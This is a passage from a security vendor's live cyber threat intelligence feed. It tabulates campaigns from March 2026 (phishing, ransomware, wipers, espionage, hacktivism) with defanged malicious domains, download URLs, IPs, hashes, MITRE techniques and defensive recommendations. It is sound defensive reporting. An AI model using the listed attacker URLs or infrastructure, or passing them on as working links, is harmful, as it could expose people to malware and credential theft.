LIVE: Cyber Threat Intelligence Feed
Our Teams are Here to Support You
This feed provides organizations with timely, actionable updates on the evolving cyber threat landscape. It highlights observed threat activity, indicators of compromise (IoCs), active campaigns, targeted sectors, and emerging vulnerabilities, along with recommended actions to help organizations proactively reduce risk. The intelligence is compiled and curated by Help AG’s CTI team using insights from internal monitoring, trusted partner sources, and industry threat and vulnerability feeds.
Threat Intel
Mar 18, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Phishing Campaign / Smishing (Fake Shipment Tracking) | posties[.]icu
estafmox[.]help
nrcsnap[.]com
pkgov[.]shop | A large-scale phishing campaign uses fake shipment tracking SMS messages to exploit the widespread use of e-commerce and courier services. Attackers use spoofed sender identities or local-looking numbers to create urgency and lure victims into clicking malicious links leading to phishing pages designed to steal personal and financial data, including card details and one-time passwords. The campaign leverages real-time WebSocket connections for immediate data exfiltration and appears coordinated, using shared infrastructure, phishing templates, and phishing-as-a-service platforms to target multiple sectors across the MEA region. | Darcula Phishing Kit | Middle East, Africa | Unknown | Finance, Telecoms, eCommerce, Transport | T1566.002; T1204; T1056; T1041 | High | Individuals should avoid clicking tracking links in SMS messages and instead visit official courier websites directly. Businesses should publish alerts about phishing campaigns, implement email authentication protocols (DMARC, DKIM, SPF), and partner with mobile carriers to filter fraudulent SMS messages. Regularly educate users about phishing tactics and promote a culture of security awareness. Implement multi-factor authentication wherever possible to add an extra layer of security. |
Ransomware Campaign / Double Extortion | 1ca67af90400ee6cbbd42175293274a0f5dc05315096cb2e214e4bfe12ffb71f
e0fd8ff6d39e4c11bdaf860c35fd8dc0
51da4b9aa541a6fc636a97d44ee265b4
bed8d1752a12e5681412efbb8283910857f7c5c431c2d73f9bbc5b379047a316
f91cbdd91e2daab31b715ce3501f5ea0
payloadynyvabjacbun4uwhmxc7yvdzorycslzmnleguxjn7glahsvqd[.]onion
payloadrz5yw227brtbvdqpnlhq3rdcdekdnn3rgucbcdeawq2v6vuyd[.]onion | The Payload ransomware group is targeting organizations across multiple sectors using a Babuk-derived ransomware with enhanced capabilities. The malware operates without command-and-control communication, encrypting files using Curve25519 and ChaCha20 while employing double extortion via Tor-based portals. It includes Windows and Linux/ESXi variants, enabling attacks on virtualized environments. The campaign leverages anti-forensic techniques such as disabling security services, deleting shadow copies, wiping logs, patching ETW, and self-deletion to evade detection and hinder recovery. | Payload Ransomware (Babuk-derived) | Bahrain | Payload Ransomware Group | Energy, Health, Telecoms, Agriculture | T1486; T1490; T1562.001; T1070.001; T1070.004; T1489; T1057; T1083; T1027; T1106 | High | Organizations should prioritize robust backup and recovery solutions, implement multi-factor authentication, regularly patch systems, and monitor for unusual network activity. Focus on endpoint detection and response (EDR) solutions capable of detecting and blocking ransomware behavior. Employee security awareness training is crucial to prevent initial infection vectors like phishing. |
Mar 14, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Operation CamelClone – Cyber Espionage / Spear-Phishing Campaign | ”
31f1a97c72f596162f0946df74838d3bef89289ce630adba8791c0f3220980ee
51af876b0f7fde362c69219f7dec39f7fb667fb53dc5fe2cbdf841d6c5951460
27d7a398a58c12093bc49f7144dac2f079232768096d0558c226ea5c53782e29
4a0e2649f89e11121ffe55546ee081ac07472db650d094314414ebf26fcb7a8e
92962bfa6df48ec0f13713c437af021f4138dc5a419bc92bc8a376d625a6519a
1d0ea66d347325902e20a12e1f2f084be45d3d6045264e513dcc420b9928013c
2671e1f43b2e5911310c5b3f124c076055eec5dee4e596854332ffcf791fd740
2902cdee050a60c3129b4bb84e74ddda7b129c3473556f689d83609d9a5981a7
630ac67d8db777ae0b93e066bd13b21908e79f23a41a64448f0a4ea38c063a44
230a22a1f1800f11718b43a7ce9390d2ef0fa9dc212d954c8fafbfbe997bbbef
62c477c0827752ffeb8ea243497eef1c666fc41025d287909d021bceb5b8e699
2dcaaedfad798dad87f27aef39885d2879825c4c8bed1dcd9e863aba0d463103
hxxps://filebulldogs[.]com/uploads/AVQB61TVOX/f[.]js
hxxps://filebulldogs[.]com/uploads/OKW5RN48ZJ/f[.]js
hxxps://filebulldogs[.]com/uploads/F1OQY9GU84/f[.]js
hxxps://filebulldogs[.]com/uploads/82WX5GP8CI/f[.]js
hxxps://filebulldogs[.]com/uploads/AVQB61TVOX/document[.]pdf
hxxps://filebulldogs[.]com/uploads/OKW5RN48ZJ/document[.]pdf
hxxps://filebulldogs[.]com/uploads/F1OQY9GU84/document[.]pdf
hxxps://filebulldogs[.]com/uploads/82WX5GP8CI/document[.]pdf
hxxps://filebulldogs[.]com/uploads/AVQB61TVOX/a[.]zip
hxxps://filebulldogs[.]com/uploads/OKW5RN48ZJ/a[.]zip
hxxps://filebulldogs[.]com/uploads/F1OQY9GU84/a[.]zip
hxxps://filebulldogs[.]com/uploads/82WX5GP8CI/a[.]zip
oliwiagibbons@onionmail[.]org
theresaunderwood@onionmail[.]org
keatonwalls@onionmail[.]org
coreyroberson@onionmail[.]org” | Spear-phishing emails deliver ZIP archives containing malicious LNK files impersonating official institutions. Executing the shortcut triggers PowerShell to download the HOPPINGANT JavaScript loader from file-sharing platforms. The loader retrieves additional payloads including decoy documents and archives containing Rclone, which connects to attacker-controlled MEGA cloud storage to exfiltrate sensitive files such as documents and Telegram session data. The campaign uses public file-sharing services instead of traditional C2 infrastructure to evade detection and conduct intelligence collection. | HOPPINGANT, Rclone | Algeria, Ukraine, Kuwait | Unknown (suspected intelligence-focused actors) | T1566.001; T1204.002; T1059.001; T1059.007; T1027; T1218; T1071.001; T1105; T1005; T1213; T1567.002 | High | Implement robust email security and phishing detection; conduct user awareness training; regularly patch systems; deploy EDR solutions; enforce MFA; segment networks to limit lateral movement; monitor outbound connections and investigate anomalies. |
Mar 13, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Handala Hack – Destructive Malware / Wiper Campaign | 5986ab04dd6b3d259935249741d3eff2
3cb9dea916432ffb8784ac36d1f2d3cd
82[.]25[.]35[.]25
31[.]57[.]35[.]223
107[.]189[.]19[.]52
146[.]185[.]219[.]235 | Ongoing destructive intrusion campaign conducted by the Handala persona associated with the Void Manticore threat cluster. Operations rely on compromised VPN credentials and trusted service provider access to infiltrate victim environments, followed by reconnaissance, credential harvesting, and privilege escalation to Domain Administrator level. Lateral movement is conducted via RDP and tunneling tools, after which coordinated destructive actions are executed through custom wipers, PowerShell-based deletion scripts, encryption tools, and manual file destruction to maximize operational disruption and psychological impact through hack-and-leak propaganda. | Handala Wiper, NetBird, VeraCrypt | N/A | Void Manticore (aka Red Sandstorm / Banished Kitten) – persona: Handala | Government, Telecommunications, Technology, Critical Infrastructure | T1133 – VPN Access; T1078.002 – Stolen Credentials; T1199 – Trusted Vendor Access; T1110 – Password Brute Force; T1003.001 – LSASS Credential Dumping; T1003.002 – SAM Credential Extraction; T1087.002 – Domain Account Discovery; T1021.001 – RDP Lateral Movement; T1572 – Network Tunneling; T1105 – Tool Downloading; T1047 – WMI Command Execution; T1484.001 – Group Policy Abuse; T1037.003 – Logon Script Execution; T1053.005 – Scheduled Task Execution; T1059.001 – PowerShell Execution; T1561.002 – Disk Wiping; T1485 – Data Destruction; T1486 – Disk Encryption Attack | Critical | Enforce MFA for VPN and privileged accounts; monitor authentication logs for anomalous access; restrict RDP exposure; detect LSASS credential dumping attempts; monitor tunneling tools such as NetBird; restrict unauthorized encryption utilities; deploy strong endpoint detection; maintain secure offline backups and tested recovery procedures; conduct threat hunting for abnormal administrative activity and destructive file operations. |
Mar 12, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Conflict-Themed Phishing Campaign – Cyber Espionage / Credential Harvesting | uzbembish@elcat[.]kg
fed6ebb87f7388adf527076b07e81dfa432bac4e899b0d7af17b85cc0205ffad
a9de383c6a1b00c9bd5a09ef87440d72ec7fc4bcd781207b3cace2f246788d4d
dfaaaf75147afbd57844382c953ec7ef36f68a9c17c66a47a847279a6b1109c9
4b9661092051839496c04169ccb52b659c0f65cefd14a990e23565a0c0e8eeaf
d518262dd687a48f273966853f3ed4eb7404eb918b165bb71ff83f75962c0104
b58ec14b0119182aef12d153280962ad76c30e3cd67533177d55481704eba705
7b6d69a249fe2adf43eefc31cdeca62cf48ab428fcbf199322feeb99d24fb001
a8acb9864e6f64323ed75e69038ca9bfe76f7b1b0d24ec7df8ac07b6dbd641a3
14efa1194cc4c6aa5585d63c032268794364123d41a01121cbd5e56f7c313399
support[.]almersalstore[.]com
almersalstore[.]com
ban[.]ali@mofa[.]gov[.]iq
nqandeel04@gmail[.]com
iwsmailserver[.]com
maria[.]tomasik@denika[.]se
unityprogressall[.]org
war[.]analyse[.]ltd@outlook[.]com
ali[.]mo@med[.]gov[.]sy
hxxps://iran[.]dashboard[.]1drvms[.]store/errors/sessionerrors/expire?client=
jscop[.]mea[.]gov[.]in@outlook[.]com
hxxps://defenceprodindia[.]site/server[.]php?file=Reader_en_install
defenceprodindia[.]site
9477d9cd1435dc465b4047745e9c71103a114d65ed0d5f02ac3c97ac3f1dbf47
a9f4f4bc12896d0f0d2eeff02dd3e3e1c1406d8a6d22d59aa85f151d806ba390
ea1d98a41ad9343d017fa72f4baeeca0daa688bec6e0508e266c5e37e9d330de
McManus[.]Michael@hotmail[.]com
hxxps://1drv[.]ms/b/c/cbec61ab8028f986/IQDa9igU3D3BRqiyNtth76AzAbOM6jUpa8apnuRl-zKXKow?e=E8bIfd
16db04b632668dae081359fc07c97e5a9b79dad61713642e48b494aa6b7828be
transfergocompany[.]com | Multiple threat groups launched coordinated phishing campaigns targeting government and diplomatic organizations during heightened geopolitical tensions. The campaigns leveraged conflict-themed lures, compromised or spoofed government email accounts, and credential harvesting pages impersonating services such as Microsoft Outlook Web App and OneDrive. Malicious attachments containing LNK loaders triggered DLL sideloading to deploy Cobalt Strike beacons and .NET loaders delivering Rust-based backdoors. In several cases, attackers used geofencing, tracking pixels, and compromised infrastructure to improve targeting and campaign effectiveness. | Cobalt Strike, Rust Backdoor | United States, India, Middle East, Europe | TA453 (APT42 / Charming Kitten / Mint Sandstorm), TA402 (Frankenstein / Cruel Jackal), TA473 (Winter Vivern), UNK_InnerAmbush, UNK_RobotDreams, UNK_NightOwl | Government, Administration, Diplomacy | T1566.002 – Phishing Link; T1566.001 – Phishing Attachment; T1566.003 – Phishing via Service; T1059.001 – PowerShell Execution; T1574.002 – DLL Side-Loading; T1105 – Payload Download; T1071.001 – Web C2 Communication; T1036 – Masquerading | High | Implement robust email filtering and phishing detection controls; enforce MFA for all remote access and email services; conduct user awareness training to identify phishing attempts; monitor network traffic and authentication logs for suspicious activity; enforce strong password policies; regularly update systems and security software; review and test incident response plans; leverage threat intelligence feeds to track emerging indicators. |
Mar 11, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Social Media Influence Operation – Information Manipulation / Psychological Influence | No technical IoCs reported. The activity involved coordinated fake Instagram personas and social media accounts used to establish contact with targets. | Coordinated influence operation using fake personas on Instagram to build relationships with users before introducing politically themed messaging. The operation relied on long-term social engineering tactics to gain trust and gradually influence public opinion. The campaign was identified and disrupted by Meta, which removed the associated accounts and content linked to the activity. | N/A | United States | Unknown state-linked influence operators | Political / Public Discourse | T1562.001 – Identity Impersonation; T1598 – Social Engineering for Information; T1606.001 – Relationship-Based Phishing | Medium | Exercise caution with unsolicited messages or connection requests on social media platforms; verify the authenticity of accounts before engaging; cross-check information shared online with trusted sources; enable multi-factor authentication for social media accounts; platforms should continue monitoring and removing coordinated inauthentic behavior and influence campaigns. |
Conflict-Driven Espionage Campaign – Cyber Espionage / Phishing Operations | No specific IoCs publicly disclosed in this advisory. Indicators referenced include phishing email infrastructure, malicious URLs, and file hashes associated with malware delivery observed across multiple campaigns. | Multiple threat actors increased cyber espionage activity targeting government and diplomatic entities during the regional conflict. Campaigns leveraged conflict-themed phishing emails, compromised accounts, and deceptive URLs to deliver malicious payloads and harvest credentials. Activity involved malicious attachments, compromised infrastructure, and impersonation of trusted services such as Microsoft Outlook Web App and OneDrive to gain initial access and collect intelligence from targeted networks. | Reader_en_install Loader, Malicious VLCMediaPlayer (masquerading payload) | India, Iran, Syria, Iraq, Europe, Middle East | TA453 (Charming Kitten), TA402 (Frankenstein), TA473 (Winter Vivern), UNK_InnerAmbush, UNK_RobotDreams, UNK_NightOwl | Government, Diplomacy | T1566 – Phishing Emails; T1189 – Malicious Websites; T1078 – Compromised Accounts; T1190 – Web Application Exploitation; T1059 – Script Execution; T1204 – User Execution; T1555 – Credential Harvesting; T1105 – Payload Download; T1071 – Web-Based C2 Communication | High | Deploy advanced email filtering and phishing detection controls; enforce MFA across remote access and email services; conduct user awareness training to identify conflict-themed phishing lures; monitor authentication logs and network traffic for anomalies; maintain strong password policies; regularly update security software; review and test incident response plans; leverage threat intelligence feeds to track emerging indicators and campaigns. |
Operation Rising Lion – Psychological Cyber Warfare / Social Engineering Campaign | No technical IoCs publicly reported. Activity involves spoofed phone calls impersonating the Israel Defense Forces Home Front Command number and fraudulent SMS messages mimicking the official OREFAlert emergency alert system. | Psychological influence campaign using spoofed emergency alerts and social engineering to create panic and erode trust in official warning systems. Attackers distributed fake emergency calls and SMS alerts warning of missile attacks or fuel shortages to manipulate civilian responses during conflict conditions. The activity forms part of broader hybrid operations combining cyber activity with psychological influence and targeted phishing attempts against key individuals and institutions. | N/A | Israel | State-linked influence operators | Government, Civilian | T1566 – Targeted Phishing; T1598 – Social Engineering for Information; T1195 – Supply Chain Trust Abuse; T1270 – Psychological Operations | High | Verify emergency alerts and communications through official government channels or verified applications; avoid acting on unsolicited emergency messages; organizations should implement verification procedures for critical communications; conduct awareness training on social engineering tactics; monitor for suspicious messaging campaigns during crisis situations. |
State-Linked Cybercrime Integration – Ransomware & Infostealer Operations | 077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de
ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888
2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6
64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1
74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d
94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444
4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be
a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377
64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb
a8c380b57cb7c381ca6ba845bd7af7333f52ee4dc4e935e98b48bb81facad72b
24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14
a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0
2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5
aae017e7a36e016655c91bd01b4f3c46309bbe540733f82cce29392e72e9bd1f | Threat actors associated with state-linked cyber operations increasingly leveraging the cybercrime ecosystem to support intelligence collection and disruptive campaigns. Groups such as Void Manticore (Handala) and MuddyWater have been observed using commercially available malware, botnets, loaders, and ransomware infrastructure typically associated with financially motivated cybercrime. The activity demonstrates a convergence between state-sponsored operations and criminal tooling, enabling actors to improve operational effectiveness, obscure attribution, and conduct targeted attacks aligned with strategic objectives. | Rhadamanthys Infostealer, Tsundere / DinDoor Botnet, CastleLoader, FakeSet, StageComp, Qilin Ransomware | Israel | Void Manticore (Handala), MuddyWater | Health, Defense, Energy, IT, Telecommunications, Government | T1566.001 – Phishing Attachment; T1566.002 – Phishing Link; T1588.001 – Malware Acquisition; T1588.002 – Tool Acquisition; T1071 – Web-based Communication; T1486 – Ransomware Encryption | High | Conduct proactive threat hunting for known indicators; deploy strong endpoint detection and response (EDR); implement network segmentation and MFA; monitor network traffic and authentication logs for suspicious activity; restrict execution of unauthorized software through application control; enhance user awareness training for phishing threats; regularly review security policies and incident response procedures. |
APT Intrusion Campaign – Critical Infrastructure Targeting | No specific IoCs publicly reported in this advisory. | Reported cyber intrusions targeting critical infrastructure organizations including a U.S. airport, a financial institution, and a software company. The activity is attributed to an advanced persistent threat (APT) group conducting operations aimed at operational disruption and intelligence collection. While technical details regarding malware or intrusion techniques remain limited, the targeting pattern indicates sustained pressure on high-value organizations during heightened geopolitical tensions. | N/A | United States | State-linked APT group (not publicly identified) | Finance, IT, Transportation | T1190 – External Service Exploitation; T1078 – Stolen Account Access; T1133 – Remote Access Abuse | High | Implement strong network segmentation to limit lateral movement; enforce multi-factor authentication for all remote access and privileged accounts; conduct regular vulnerability assessments and penetration testing; monitor network and authentication logs for anomalous activity; perform proactive threat hunting; ensure incident response plans are updated and regularly tested. |
Mar 10, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
State-Linked Cybercrime Integration – Ransomware & Infostealer Operations | No specific IoCs publicly reported in this advisory. | Security researchers report increased collaboration between state-linked cyber actors and cybercriminal ecosystems. The activity involves leveraging ransomware-as-a-service (RaaS), infostealers, and malware-as-a-service (MaaS) platforms to support intelligence collection, disruptive operations, and attribution evasion. Rather than using cybercrime purely as a cover, the actors are integrating criminal infrastructure, tools, and affiliate networks into state-aligned cyber operations to expand capabilities and operational reach. | Ransomware variants, Infostealers, Malware-as-a-Service platforms | N/A | State-linked cyber actors | Multi-sector (potentially government, enterprise, and infrastructure targets) | T1566.001 – Phishing Attachment; T1078.004 – Compromised Account Access; T1486 – Ransomware Encryption | High | Strengthen threat detection and monitoring capabilities to identify activity associated with criminal tooling; enforce multi-factor authentication and strong credential policies; apply regular patching and system updates; conduct security awareness training focused on phishing and social engineering; implement network segmentation and least privilege access controls; share threat intelligence to improve collective defense. |
State-Linked Cybercrime Integration – Use of Criminal Infrastructure | No specific IoCs publicly reported in this advisory. Indicators referenced include shared malware infrastructure, code-signing certificates, and tools used across multiple campaigns. | Threat actors associated with state-linked operations increasingly leveraging cybercrime ecosystems to support state-directed cyber operations. Groups such as Void Manticore (Handala) and MuddyWater have been observed using commercially available malware, botnets, loaders, and ransomware infrastructure typically associated with financially motivated cybercrime. The integration of criminal services such as ransomware-as-a-service and infostealers allows these actors to enhance operational capability, obscure attribution, and conduct targeted operations against strategic organizations, including healthcare and government institutions. | Rhadamanthys Infostealer, Tsundere / DinDoor Botnet, CastleLoader, FakeSet, StageComp, Qilin Ransomware | Israel, Albania | Void Manticore (Handala), MuddyWater | Healthcare, Government, Defense | T1566 – Phishing Emails; T1078 – Stolen Account Access; T1105 – Malware Download; T1059 – Script Execution; T1204 – User Execution; T1547 – Persistence Mechanism; T1027 – Obfuscated Malware; T1133 – Remote Access Abuse; T1555 – Credential Theft | High | Conduct proactive threat hunting for indicators related to known malware families; deploy strong endpoint detection and response (EDR); enforce multi-factor authentication and network segmentation; monitor network traffic and authentication logs for anomalies; restrict execution of unauthorized software through application control; strengthen user awareness training against phishing; maintain updated security policies and incident response procedures. |
Telegram Hacktivist Activity Timeline – Coordinated Hacktivism / Multi-Vector Cyber Activity | No specific IoCs publicly reported in this advisory. Activity primarily coordinated through Telegram channels used by hacktivist groups to claim attacks and share operational updates. | Coordinated hacktivist activity emerging during the Iran–Israel–US conflict beginning March 2026. Multiple groups formed alliances and claimed attacks targeting government portals, financial services, energy infrastructure, aviation services, healthcare institutions, and educational organizations. Operations included DDoS attacks, attempted data breaches, ransomware activity, website exploitation, and alleged operational technology (OT) intrusions. The campaign expanded geographically across the Middle East, Europe, and allied regions, demonstrating an increase in politically motivated cyber operations and hacktivist coordination through messaging platforms. | DDoS tools, ransomware variants (unspecified) | Israel, United States, Kuwait, Jordan, Saudi Arabia, UAE, Cyprus, UK | Cyber Islamic Resistance, 313 Team, Keymous Plus, NoName057(16), DieNet, Nation of Saviors, Team Fearless, Cyb3rDrag0nz, Moroccan Black Cyber Army | Finance, Government, Energy, Aviation, Healthcare, Education, Defense | T1499 – DDoS Service Disruption; T1566 – Phishing Initial Access; T1190 – Web Application Exploitation; T1486 – Ransomware Encryption; T1560 – Data Exfiltration Archives; T1189 – Drive-by Compromise | High | Implement strong DDoS mitigation strategies and web application protections; monitor critical infrastructure systems for suspicious activity; patch exposed public-facing services; deploy strong access controls and continuous monitoring; conduct proactive threat hunting and vulnerability management; monitor for potential data exfiltration and misinformation campaigns; participate in threat intelligence sharing initiatives to track evolving hacktivist activity. |
State Cyber Strategy – Offensive Cyber Planning | No technical IoCs reported. | Strategic policy shift outlining expanded offensive cyber capabilities and defensive resilience measures in response to escalating geopolitical tensions. The strategy focuses on disrupting adversarial networks before breaches occur, strengthening critical infrastructure protection, implementing zero trust architecture across federal systems, enhancing encryption standards, and increasing collaboration with private sector cybersecurity providers. It also emphasizes investments in emerging technologies such as AI and post-quantum cryptography while preparing cyber operations to play a central role in modern geopolitical conflict. | N/A | United States, Israel, Iran | (External) Government-led cyber strategy | Energy, Finance, IT, Healthcare, Utilities | T1562.001 – Defense Evasion / Security Hardening Context | Medium | Implement zero trust architecture across critical systems; strengthen encryption and identity security controls; improve public-private cyber defense collaboration; enhance continuous monitoring and threat intelligence sharing; invest in workforce development and incident response capabilities to strengthen organizational cyber resilience. |
BoryptGrab Campaign – Multi-Stage Infostealer / Credential Theft | Malware campaign distributing the BoryptGrab information stealer through fake GitHub repositories and deceptive download portals offering free software tools, cheats, or utilities. Victims are redirected to malicious pages that deliver ZIP archives containing the payload. Execution triggers a multi-stage infection chain using VBS downloaders, DLL side-loading, and encrypted launcher payloads to deploy BoryptGrab and additional malware. The stealer collects browser credentials, cryptocurrency wallet data, system information, files, screenshots, Telegram data, and Discord tokens. In some cases, TunnesshClient establishes a reverse SSH tunnel for persistence and proxy access, while additional loaders may deploy Vidar variants and other components. | BoryptGrab, Vidar, TunnesshClient, HeaconLoad | N/A | Unknown | Multi-sector / Consumer endpoints | T1189 – Drive-by Download; T1566.002 – Phishing Link; T1574.002 – DLL Side-Loading; T1059.005 – VBS Script Execution; T1059.001 – PowerShell Execution; T1053.005 – Scheduled Task Persistence; T1547.001 – Startup Persistence; T1027 – Obfuscated Malware; T1105 – Payload Download; T1041 – Data Exfiltration | High | Avoid downloading tools from unknown or unofficial repositories; verify the authenticity of developers before downloading files; monitor and block suspicious ZIP downloads; restrict DLL side-loading through application control; monitor scheduled task creation and persistence activity; inspect outbound traffic for suspicious downloads or exfiltration; deploy endpoint protection capable of detecting infostealers; keep systems and browsers updated; educate users about risks of cracked software and unofficial tools. | |
Dindoor Backdoor Deployment – State-Linked Network Intrusion / Persistence | No specific IoCs publicly reported in this advisory. | Threat actors associated with the MuddyWater (Seedworm) group have been observed establishing persistent access within enterprise networks across multiple sectors. The campaign involves long-term network infiltration intended to maintain covert access for potential future disruption, intelligence collection, or data exfiltration. The activity represents a shift from traditional espionage operations toward maintaining embedded access within critical infrastructure environments, allowing attackers to blend with legitimate network activity and launch operations at a later stage. | Dindoor Backdoor | United States, Israel | MuddyWater (Seedworm) | Finance, IT, Government, Transportation | T1547.001 – Persistence via Startup Mechanisms; T1078 – Valid Account Abuse; T1133 – External Remote Access; T1059.001 – PowerShell Execution | High | Implement strong network segmentation to limit lateral movement; deploy intrusion detection and prevention systems; audit privileged accounts and access permissions regularly; enable enhanced logging and monitoring to detect anomalous activity; conduct proactive threat hunting for persistence mechanisms; implement zero trust architectures to continuously verify user and device access. |
Strategic Cyber Conflict Analysis – Cyber Warfare Escalation | No technical IoCs reported. | Analysis discussing the growing prominence of cyber operations as a central component of modern geopolitical conflict. The report highlights how cyber capabilities are increasingly being used as primary instruments of state conflict, shifting from covert intelligence operations toward overt cyber warfare activities. The discussion reflects the evolving role of cyber operations in strategic military engagements and their potential to replace or complement traditional warfare methods. | N/A | Iran | N/A | Government, IT | N/A | Medium | Strengthen cyber resilience through proactive threat intelligence monitoring, vulnerability management, and incident response preparedness; implement continuous monitoring and threat hunting to detect emerging cyber threats; promote information sharing and cooperation to address evolving cyber warfare risks. |
Camaro Dragon Campaign – Cyber Espionage / Malware Delivery | 4d8027424b5bcd167ab70c8320ce3c5df72a9ecca01246b095e4af498f77725d
fff7864019b651bea2448228d6557d995edc929276bb9d8cb34c3c280a42684e
fa3a1153018ac1e1a35a65e445a2bad33eac582c225cf6c38d0886802481cd43
a7c56033f2264c71b0485da693e3f627b2b5ccfe3399a53cc558be77f95d9c13
c78eb1cecef5f865b6d150adcf67fa5712c5a16b94f1618c32191e61fbe69590
1ddbed0328a60bb4f725b4ef798d5d14f29c04f7ffe9a7a6940cacb557119a1c
26d10996fd2880441445539cd8a6e7fe0777f6ca3352dae6ef84d1d747aabb0c
a9de383c6a1b00c9bd5a09ef87440d72ec7fc4bcd781207b3cace2f246788d4d
b58ec14b0119182aef12d153280962ad76c30e3cd67533177d55481704eba705
a8acb9864e6f64323ed75e69038ca9bfe76f7b1b0d24ec7df8ac07b6dbd641a3
almersalstore[.]com | Cyber espionage campaign targeting organizations in the Middle East using conflict-themed phishing lures referencing missile strikes and attacks on Gulf oil and gas facilities. Malicious archives containing LNK files initiate a multi-stage infection chain leading to deployment of the PlugX backdoor and Cobalt Strike. Attackers leveraged DLL side-loading and widely available offensive tooling to establish access and conduct reconnaissance, demonstrating rapid adaptation to geopolitical developments to increase lure credibility. | PlugX Backdoor, Cobalt Strike | Qatar | Camaro Dragon (Earth Preta / Mustang Panda) | N/A | T1566.001 – Phishing Attachment; T1204.002 – Malicious File Execution; T1574.002 – DLL Side-Loading; T1105 – Payload Download; T1059 – Command Execution; T1071 – Web C2 Communication | High | Enhance threat monitoring and incident response readiness; deploy advanced email security and phishing detection; implement robust endpoint protection; educate employees on current-event themed phishing lures; conduct proactive threat hunting related to geopolitical events. |
IP Camera Reconnaissance Campaign – Cyber Espionage / Surveillance Infrastructure Targeting | Vulnerabilities exploited: CVE-2017-7921, CVE-2021-36260, CVE-2023-6895, CVE-2025-34067, CVE-2021-33044 affecting internet-exposed IP camera systems and management platforms. | Threat actors conducted reconnaissance operations by exploiting vulnerabilities in internet-connected IP cameras, primarily Hikvision and Dahua devices. The activity aims to gather intelligence and perform battle damage assessment by accessing live video feeds and surveillance infrastructure. Compromised cameras were reportedly used to observe sensitive locations and monitor the impact of military operations. The campaign reflects the increasing use of IoT surveillance devices as intelligence collection tools during geopolitical conflicts. | N/A | Israel, UAE, Qatar, Bahrain, Kuwait, Lebanon, Cyprus | State-linked cyber actors | Government, Science, Military | T1190 – Remote Service Exploitation | High | Remove internet exposure of IP cameras and place devices behind VPN or zero-trust access gateways; change default credentials and enforce strong authentication; regularly update firmware and patch known vulnerabilities; isolate surveillance devices on segmented networks; monitor authentication logs and outbound traffic for suspicious activity; prioritize remediation of vulnerabilities listed in the KEV catalog. |
Mar 9, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Seedworm Campaign – Cyber Espionage / Infrastructure Targeting | Indicators referenced include certificates signed to “Amy Cherne” and “Donald Gay” used in attacker tooling and infrastructure. No additional technical IoCs publicly disclosed in this advisory. | Ongoing cyber espionage and intrusion activity attributed to the Seedworm (MuddyWater) threat group targeting critical infrastructure and enterprise organizations. The campaign involves establishing persistent access to victim environments using custom backdoors and legitimate tools for data exfiltration and command execution. Targets include financial institutions, aviation organizations, software companies, and NGOs across North America and allied regions. The activity reflects expanded operational scope during geopolitical escalation and includes additional disruption attempts by aligned groups using DDoS techniques. | Dindoor Backdoor, Fakeset, Darkcomp, Rclone | United States, Canada, Israel | Seedworm (MuddyWater / Temp Zagros / Static Kitten), Handala, DieNet | Finance, IT, Government, Energy, Healthcare, Transportation | T1566 – Phishing Initial Access; T1190 – Web Application Exploitation; T1078 – Valid Account Abuse; T1027 – Obfuscated Malware; T1560 – Data Collection & Archiving; T1041 – Data Exfiltration over C2 | Critical | Enforce multi-factor authentication across all remote access and privileged accounts; monitor outbound network traffic for abnormal data transfers; deploy web application firewalls and updated detection rules; restrict unauthorized external cloud storage access; maintain immutable offline backups; implement network segmentation and least-privilege access controls; conduct proactive threat hunting and continuous monitoring for indicators of compromise. |
Hacktivist Mobilization – Coordinated Cyber Activity / Disruption Campaigns | No specific IoCs publicly reported. Activity primarily coordinated through online communities and messaging platforms used by hacktivist groups to organize operations and publicize attacks. | Following recent geopolitical escalation, more than 60 hacktivist groups rapidly mobilized and began conducting cyber operations aligned with broader political objectives. These groups reportedly leveraged AI tools to enhance operational planning, target discovery, and messaging amplification. The surge in activity increases the complexity of the threat landscape by combining hacktivist operations with broader nation-state cyber activity, potentially leading to disruption campaigns, influence operations, and opportunistic attacks against organizations linked to geopolitical actors. | N/A | United States, Israel, Iran | Multiple hacktivist groups (various) | Multi-sector | T1499 – Service Disruption (DDoS); T1585 – Online Persona Creation; T1598 – Social Engineering / Influence | High | Heighten monitoring and incident response readiness; deploy strong intrusion detection and network monitoring; enforce multi-factor authentication and strong access controls; maintain up-to-date systems and security tools; conduct 